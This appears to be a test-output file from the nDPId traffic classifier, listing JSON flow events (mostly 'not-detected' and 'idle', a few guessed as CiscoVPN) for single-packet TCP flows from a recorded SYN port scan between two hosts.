+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5952,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3905,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3905,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3905,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3905,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1862,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1936,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1863,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1936,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1863,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1862,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5959,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5959,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8008,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1986,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1863,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1986,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1863,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5960,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5960,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":865,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1864,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":865,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1864,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5959,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5959,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8008,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5961,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5961,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5960,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5960,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 